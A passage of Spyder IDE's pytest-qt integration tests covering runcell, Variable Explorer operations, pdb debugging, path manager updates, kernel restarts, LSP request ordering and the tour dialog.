    assert "cell-test.py" in shell.get_value('fname')
    # Verify that the `__file__` variable is undefined after the cell ran
    # (runcell must not leak it into the namespace).
    try:
        shell.get_value('__file__')
        assert False
    except KeyError:
        pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_leading_indent(main_window, qtbot, tmpdir):
    """Test the runcell command with leading indent."""
    # Write code with a cell to a file. The cell marker (# %%) sits inside
    # an `if` block, so the cell body carries a leading indent.
    code = ("def a():\n    return\nif __name__ == '__main__':\n"
            "# %%\n    print(1233 + 1)\n")
    p = tmpdir.join("cell-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Execute runcell
    with qtbot.waitSignal(shell.executed):
        shell.execute("runcell(1, r'{}')".format(to_text_string(p)))
    # The indented cell must run correctly (prints 1234) without a syntax
    # complaint about the leading indent.
    assert "1234" in shell._control.toPlainText()
    assert "This is not valid Python code" not in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
    """
    Test renaming a variable.
    Regression test for spyder-ide/spyder#10735

    Runs a script, renames one variable in the Variable Explorer, then
    re-runs the script and checks both the renamed and the recreated
    variable are listed.
    """
    # ---- Setup ----
    p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run file ----
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Rename one element
    nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
    nsb.editor.rename_item(new_name='arr2')

    # Wait until all objects have updated in the variable explorer
    def data(cm, i, j):
        # Helper: return the display data at cell (i, j) of model `cm`.
        return cm.data(cm.index(i, j))
    qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
                    timeout=EVAL_TIMEOUT)

    assert data(nsb.editor.model, 0, 0) == 'a'
    assert data(nsb.editor.model, 1, 0) == 'arr2'
    assert data(nsb.editor.model, 2, 0) == 'li'
    assert data(nsb.editor.model, 3, 0) == 's'

    # ---- Run file again ----
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
                    timeout=EVAL_TIMEOUT)

    # `arr` is recreated by the script; `arr2` (the renamed copy) remains
    assert data(nsb.editor.model, 0, 0) == 'a'
    assert data(nsb.editor.model, 1, 0) == 'arr'
    assert data(nsb.editor.model, 2, 0) == 'arr2'
    assert data(nsb.editor.model, 3, 0) == 'li'
    assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
    """
    Test removing a variable.
    Regression test for spyder-ide/spyder#10709

    Runs a script, removes one variable from the Variable Explorer, and
    checks the remaining rows are the expected ones.
    """
    # ---- Setup ----
    p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run file ----
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Remove one element
    nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
    nsb.editor.remove_item(force=True)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
                    timeout=EVAL_TIMEOUT)

    def data(cm, i, j):
        # Helper: re-checks the row count, then returns cell (i, j) data.
        assert cm.rowCount() == 3
        return cm.data(cm.index(i, j))
    assert data(nsb.editor.model, 0, 0) == 'a'
    assert data(nsb.editor.model, 1, 0) == 'li'
    assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
    """
    Test refreshing the variable explorer while the kernel is executing.

    The namespace view is not sent automatically while code runs, so the
    table starts empty; an explicit refresh must fetch the loop variable.
    """
    # Create object
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = main_window.ipyconsole.get_focus_widget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Kernel busy for ~1s printing a counter
    shell.execute("import time\n"
                  "for i in range(10):\n"
                  "    print('i = {}'.format(i))\n"
                  "    time.sleep(.1)\n")

    qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
    qtbot.wait(300)
    # Get value object
    nsb = main_window.variableexplorer.current_widget()

    # This is empty
    assert len(nsb.editor.source_model._data) == 0
    nsb.refresh_table()
    qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)
    # `i` was captured mid-loop, so it is strictly between the endpoints
    assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
    """
    Test if runcell works with an unnamed cell at the top of the file
    and with an empty cell.
    """
    # Write code with a cell to a file: cell 0 is the unnamed header code,
    # cell 1 (after '#%%') is empty.
    code = ('if True:\n'
            '    a = 1\n'
            '#%%')
    p = tmpdir.join("test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    code_editor = main_window.editor.get_focus_widget()
    # call runcell (Shift+Return runs the current cell and advances)
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    assert 'runcell(0' in shell._control.toPlainText()
    assert 'cell is empty' not in shell._control.toPlainText()
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    assert 'runcell(1' in shell._control.toPlainText()
    # The empty cell must warn, not error out
    assert 'Error' not in shell._control.toPlainText()
    assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
    """
    Test the runcell command in pdb.

    Steps into ``foo`` so that ``abba`` is a pdb local, then reruns the
    cell from the editor and checks the cell sees the local namespace.
    """
    # Write code with a cell to a file
    code = ("if 'abba' in dir():\n"
            "    print('abba {}'.format(abba))\n"
            "else:\n"
            "    def foo():\n"
            "        abba = 27\n"
            "    foo()\n")
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Step until `abba = 27` has executed inside foo()
    for key in ['!n', '!n', '!s', '!n', '!n']:
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(shell._control, key)
            qtbot.keyClick(shell._control, Qt.Key_Enter)

    assert shell.get_value('abba') == 27

    code_editor.setFocus()
    # call runcell
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    assert "runcell" in shell._control.toPlainText()

    # Make sure the local variables are detected
    assert "abba 27" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
    "debug", [False, True])
def test_runcell_cache(main_window, qtbot, debug):
    """
    Test the runcell command cache.

    Triggers the second cell while the first is still sleeping; the
    cached request must still run it (both in normal and pdb mode).
    """
    # Write code with a cell to a file
    code = ("import time\n"
            "time.sleep(.5)\n"
            "# %%\n"
            "print('Done')\n")
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)

    if debug:
        # Start debugging
        with qtbot.waitSignal(shell.executed):
            shell.execute("%debug print()")

    # Run the two cells back-to-back; the second lands while the first
    # cell's sleep is still executing.
    code_editor.setFocus()
    code_editor.move_cursor(0)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(100)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(500)

    qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText())
# --- Path manager
# ----------------------------------------------------------------------------
@pytest.mark.slow
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
    """
    Check that on path manager updates, consoles correctly update.

    Adds a folder through the Path Manager dialog and verifies it shows
    up in ``sys.path`` of both the internal console and every IPython
    console client.
    """
    main_window.show_path_manager()
    dlg = main_window._path_manager

    test_folder = 'foo-spam-bar-123'
    folder = str(tmpdir.mkdir(test_folder))
    dlg.add_path(folder)
    qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)

    with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT):
        dlg.button_ok.animateClick()

    cmd = 'import sys;print(sys.path)'

    # Check Spyder is updated
    main_window.console.execute_lines(cmd)
    syspath = main_window.console.get_sys_path()
    assert folder in syspath

    # Check clients are updated
    count = 0
    for client in main_window.ipyconsole.get_clients():
        shell = client.shellwidget
        if shell is not None:
            syspath = shell.execute(cmd)
            control = shell._control
            # `shell.executed` signal was not working so we use waitUntil
            qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
                            timeout=EVAL_TIMEOUT)
            assert test_folder in control.toPlainText()
            count += 1
    # At least one client must have been checked
    assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
                    reason="It times out on macOS and Windows")
def test_pdb_key_leak(main_window, qtbot, tmpdir):
    """
    Check that pdb notify spyder doesn't call
    QApplication.processEvents(). If it does there might be keystoke leakage.
    see #10834
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = shell._control

    # Write code to a file: tmp.py raises ZeroDivisionError, tmp2.py
    # imports and calls it so the traceback spans two files.
    code1 = ("def a():\n"
             "    1/0")
    code2 = ("from tmp import a\n"
             "a()")
    folder = tmpdir.join('tmp_folder')
    test_file = folder.join('tmp.py')
    test_file.write(code1, ensure=True)

    test_file2 = folder.join('tmp2.py')
    test_file2.write(code2)

    # Run tmp2 and get an error
    with qtbot.waitSignal(shell.executed):
        shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
                      '", wdir="' + str(folder).replace("\\", "/") + '")')
    assert '1/0' in control.toPlainText()

    # Replace QApplication.processEvents to make sure it is not called
    super_processEvents = QApplication.processEvents

    def processEvents():
        # Record the call, then delegate to the real implementation.
        processEvents.called = True
        return super_processEvents()

    processEvents.called = False
    try:
        QApplication.processEvents = processEvents
        # Debug and open both files
        with qtbot.waitSignal(shell.executed):
            shell.execute('%debug')
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(control, '!u')
            qtbot.keyClick(control, Qt.Key_Enter)

        # Wait until both files are open.
        qtbot.waitUntil(
            lambda: osp.normpath(str(test_file)) in [
                osp.normpath(p) for p in main_window.editor.get_filenames()])
        # Fix: normalize test_file2 too — comparing the raw path against
        # normalized editor filenames never matches when separators differ.
        qtbot.waitUntil(
            lambda: osp.normpath(str(test_file2)) in [
                osp.normpath(p) for p in main_window.editor.get_filenames()])

        # Make sure the events are not processed.
        assert not processEvents.called
    finally:
        QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
@pytest.mark.parametrize(
    "where", [True, False])
def test_pdb_step(main_window, qtbot, tmpdir, where):
    """
    Check that pdb notify Spyder only moves when a new line is reached.

    With ``where=True`` the ``!w`` command is expected to refocus the
    editor on the current debug frame; otherwise the editor must stay on
    whatever file the user selected.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = shell._control

    # Write code to a file
    code1 = ("def a():\n"
             "    1/0")
    code2 = ("from tmp import a\n"
             "a()")
    folder = tmpdir.join('tmp_folder')
    test_file = folder.join('tmp.py')
    test_file.write(code1, ensure=True)

    test_file2 = folder.join('tmp2.py')
    test_file2.write(code2)

    # Run tmp2 and get an error
    with qtbot.waitSignal(shell.executed):
        shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
                      '", wdir="' + str(folder).replace("\\", "/") + '")')
    assert '1/0' in control.toPlainText()

    # Debug and enter first file
    with qtbot.waitSignal(shell.executed):
        shell.execute('%debug')
    qtbot.waitUntil(
        lambda: osp.samefile(
            main_window.editor.get_current_editor().filename,
            str(test_file)))

    # Move to another file
    main_window.editor.new()
    qtbot.wait(100)
    assert main_window.editor.get_current_editor().filename != str(test_file)
    current_filename = main_window.editor.get_current_editor().filename

    # Run a random command, make sure we don't move
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!a')
        qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.wait(1000)
    assert current_filename == main_window.editor.get_current_editor().filename

    # Go up and enter second file
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!u')
        qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.waitUntil(
        lambda: osp.samefile(
            main_window.editor.get_current_editor().filename,
            str(test_file2)))

    # Go back to first file
    editor_stack = main_window.editor.get_current_editorstack()
    index = editor_stack.has_filename(str(test_file))
    assert index is not None
    editor_stack.set_stack_index(index)

    assert osp.samefile(
        main_window.editor.get_current_editor().filename,
        str(test_file))

    if where:
        # go back to the second file with where
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(control, '!w')
            qtbot.keyClick(control, Qt.Key_Enter)
        qtbot.wait(1000)

        # Make sure we moved
        assert osp.samefile(
            main_window.editor.get_current_editor().filename,
            str(test_file2))

    else:
        # Stay at the same place
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(control, '!a')
            qtbot.keyClick(control, Qt.Key_Enter)
        qtbot.wait(1000)

        # Make sure we didn't move
        assert osp.samefile(
            main_window.editor.get_current_editor().filename,
            str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
                    reason="Fails sometimes on macOS")
def test_runcell_after_restart(main_window, qtbot):
    """
    Test runcell after a kernel restart.

    The runcell machinery must be re-registered with the fresh kernel so
    the cell executes without errors.
    """
    # Write code to a file
    code = "print('test_runcell_after_restart')"
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)

    # Restart Kernel
    with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
        shell.ipyclient.restart_kernel()

    # call runcell
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.waitUntil(
        lambda: "test_runcell_after_restart" in shell._control.toPlainText())

    # Make sure no errors are shown
    assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
                    reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
    "ipython", [True, False])
@pytest.mark.parametrize(
    "test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
    """
    Test the runcell command with cell magic.

    Cell magics are only allowed in ``.ipy`` files; for plain ``.py``
    files runcell must print an error telling the user to rename the
    file with the ``.ipy`` extension.
    """
    # Write code with a cell to a file
    write_file = tmpdir.mkdir("foo").join("bar.txt")
    assert not osp.exists(to_text_string(write_file))
    if test_cell_magic:
        code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
    else:
        code = "\n\n%debug print()"
    if ipython:
        fn = "cell-test.ipy"
    else:
        fn = "cell-test.py"
    p = tmpdir.join(fn)
    p.write(code)
    main_window.editor.load(to_text_string(p))
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Execute runcell
    with qtbot.waitSignal(shell.executed):
        shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
    control = main_window.ipyconsole.get_focus_widget()

    error_text = 'save this file with the .ipy extension'
    try:
        if ipython:
            if test_cell_magic:
                # %%writefile must report success and create the file
                qtbot.waitUntil(
                    lambda: 'Writing' in control.toPlainText())

                # Verify that the code was executed
                assert osp.exists(to_text_string(write_file))
            else:
                qtbot.waitSignal(shell.executed)
            assert error_text not in control.toPlainText()
        else:
            qtbot.waitUntil(lambda: error_text in control.toPlainText())
    finally:
        # Clean up the written file regardless of the outcome
        if osp.exists(to_text_string(write_file)):
            os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
    """
    Test that the running namespace is correctly sent when debugging in a
    new namespace.

    While stopped at a breakpoint inside ``test``, the Variable Explorer
    must show the function's locals (``a == 5``) and not the interactive
    namespace (``b``); after continuing, the interactive namespace is back.
    """
    code = ("def test(a):\n    print('a:',a)\na = 10\ntest(5)")

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)
    code_editor.debugger.toogle_breakpoint(line_number=2)

    # Write b in the namespace
    with qtbot.waitSignal(shell.executed):
        shell.execute('b = 10')

    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
    assert nsb.editor.source_model._data['b']['view'] == '10'

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # b should not be there (running namespace) and the local a should be 5
    qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
                    nsb.editor.source_model._data['a']['view'] == '5',
                    timeout=3000)
    assert 'b' not in nsb.editor.source_model._data
    assert nsb.editor.source_model._data['a']['view'] == '5'
    qtbot.waitUntil(shell.is_waiting_pdb_input)
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute('!c')

    # At the end, b should be back and a should be 10
    qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
    assert nsb.editor.source_model._data['a']['view'] == '10'
    assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
    """
    Test post mortem works.

    Running a file that raises with ``post_mortem=True`` must drop into
    the IPdb debugger.
    """
    # Check we can use custom complete for pdb
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_focus_widget()

    test_file = tmpdir.join('test.py')
    test_file.write('raise RuntimeError\n')

    with qtbot.waitSignal(shell.executed):
        shell.execute(
            "runfile(" + repr(str(test_file)) + ", post_mortem=True)")

    # The IPdb prompt signals we entered post-mortem debugging
    assert "IPdb [" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
    """
    Test that we can run an unsaved file with multiprocessing.

    The child process runs ``traceback.print_exc``; since there is no
    active exception it prints ``None`` (or a multiprocessing warning on
    Windows, where unsaved files can't be spawned).
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    # Fix: compare __name__ with `==`, not `is` — identity comparison
    # with a string literal is a SyntaxWarning and relies on interning.
    code_editor.set_text(
        "import multiprocessing\n"
        "import traceback\n"
        'if __name__ == "__main__":\n'
        "    p = multiprocessing.Process(target=traceback.print_exc)\n"
        "    p.start()\n"
        "    p.join()\n"
    )
    # This code should run even on windows

    # Start running
    qtbot.mouseClick(run_button, Qt.LeftButton)

    # Because multiprocessing is behaving strangly on windows, only some
    # situations will work. This is one of these situations so it shouldn't
    # be broken.
    if os.name == 'nt':
        qtbot.waitUntil(
            lambda: "Warning: multiprocessing" in shell._control.toPlainText())
    else:
        # There is no exception, so the exception is None
        qtbot.waitUntil(
            lambda: 'None' in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
                    reason="Fails sometimes on macOS")
def test_varexp_cleared_after_kernel_restart(main_window, qtbot):
    """
    Test that the variable explorer is cleared after a kernel restart.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Create a variable
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert the value is shown in the variable explorer
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
                    timeout=3000)

    # Restart Kernel
    with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
        shell.ipyclient.restart_kernel()

    # Assert the value was removed
    qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
                    timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_reset(main_window, qtbot):
    """
    Test that the variable explorer is cleared after triggering a
    reset in the IPython console and variable explorer panes.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Create a variable
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert the value is shown in the variable explorer
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
                    timeout=3000)

    # Trigger a reset in the variable explorer
    nsb.reset_namespace()

    # Assert the value was removed
    qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
                    timeout=3000)

    # Create the variable again
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert the value is shown in the variable explorer
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
                    timeout=3000)

    # Trigger a reset in the console
    shell.ipyclient.reset_namespace()

    # Assert the value was removed
    qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
                    timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_immediate_debug(main_window, qtbot):
    """
    Check if we can enter debugging immediately.

    `%debug` is sent before waiting for the first prompt, so the kernel
    must handle it as soon as it is ready.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    with qtbot.waitSignal(shell.executed, timeout=SHELL_TIMEOUT):
        shell.execute("%debug print()")
@pytest.mark.slow
@flaky(max_runs=3)
def test_local_namespace(main_window, qtbot, tmpdir):
    """
    Test that the local namespace is not reset.

    This can happen if `frame.f_locals` is called on the current frame, as this
    has the side effect of discarding the pdb locals.
    """
    code = ("""
def hello():
    test = 1
    print('test ==', test)
hello()
""")

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)
    # Break on the print() line inside hello()
    code_editor.debugger.toogle_breakpoint(line_number=4)

    nsb = main_window.variableexplorer.current_widget()

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Check `test` has a value of 1
    # Here we use "waitUntil" because `shell.executed` is emitted twice
    # One at the beginning of the file, and once at the breakpoint
    qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and
                    nsb.editor.source_model._data['test']['view'] == '1',
                    timeout=3000)

    # change value of test
    with qtbot.waitSignal(shell.executed):
        shell.execute("test = 1 + 1")

    # check value of test
    with qtbot.waitSignal(shell.executed):
        shell.execute("print('test =', test)")
    assert "test = 2" in shell._control.toPlainText()

    # change value of test
    with qtbot.waitSignal(shell.executed):
        shell.execute("test = 1 + 1 + 1")

    # do next
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!next")

    # The print() in the debuggee must see the value set through pdb
    assert "test == 3" in shell._control.toPlainText()

    # Check the namespace browser is updated
    assert ('test' in nsb.editor.source_model._data and
            nsb.editor.source_model._data['test']['view'] == '3')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
def test_ordering_lsp_requests_at_startup(main_window, qtbot):
    """
    Test the ordering of requests we send to the LSP at startup when a
    project was left open during the previous session.

    This is a regression test for spyder-ide/spyder#13351.
    """
    # Wait until the LSP server is up.
    code_editor = main_window.editor.get_current_editor()
    # NOTE(review): a bare qtbot.waitSignal() without `with` does not
    # actually wait; the qtbot.wait(5000) below is what gives the server
    # time to come up — confirm before relying on this line.
    qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000)

    # Wait until the initial requests are sent to the server.
    lsp = main_window.completions.get_provider('lsp')
    python_client = lsp.clients['python']
    qtbot.wait(5000)

    # The requests must arrive in this relative order
    expected_requests = [
        'initialize',
        'initialized',
        'workspace/didChangeConfiguration',
        'workspace/didChangeWorkspaceFolders',
        'textDocument/didOpen',
    ]
    # Requests that may legitimately appear between two expected ones
    skip_intermediate = {
        'initialized': {'workspace/didChangeConfiguration'}
    }

    lsp_requests = python_client['instance']._requests
    start_idx = lsp_requests.index((0, 'initialize'))

    # Walk the recorded requests, matching them against the expected
    # sequence while skipping allowed intermediates.
    request_order = []
    expected_iter = iter(expected_requests)
    current_expected = next(expected_iter)
    for i in range(start_idx, len(lsp_requests)):
        if current_expected is None:
            break
        _, req_type = lsp_requests[i]
        if req_type == current_expected:
            request_order.append(req_type)
            current_expected = next(expected_iter, None)
        else:
            # Idiom fix: set() instead of set({})
            skip_set = skip_intermediate.get(current_expected, set())
            if req_type in skip_set:
                continue
            else:
                assert req_type == current_expected

    assert request_order == expected_requests
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
    'main_window',
    [{'spy_config': ('main', 'show_tour_message', 2)}],
    indirect=True)
def test_tour_message(main_window, qtbot):
    """Test that the tour message displays and sends users to the tour."""
    # Wait until window setup is finished, which is when the message appears
    # NOTE(review): waitSignal without `with` does not block; verify the
    # dialog is ready by the waitUntil calls below.
    qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000)

    # Check that tour is shown automatically and manually show it
    assert CONF.get('main', 'show_tour_message')
    main_window.show_tour_message(force=True)

    # Wait for the message to appear
    qtbot.waitUntil(lambda: bool(main_window.tour_dialog), timeout=5000)
    qtbot.waitUntil(lambda: main_window.tour_dialog.isVisible(), timeout=2000)

    # Check that clicking dismiss hides the dialog and disables it
    qtbot.mouseClick(main_window.tour_dialog.dismiss_button, Qt.LeftButton)
    qtbot.waitUntil(lambda: not main_window.tour_dialog.isVisible(),
                    timeout=2000)
    assert not CONF.get('main', 'show_tour_message')

    # Confirm that calling show_tour_message() normally doesn't show it again
    main_window.show_tour_message()
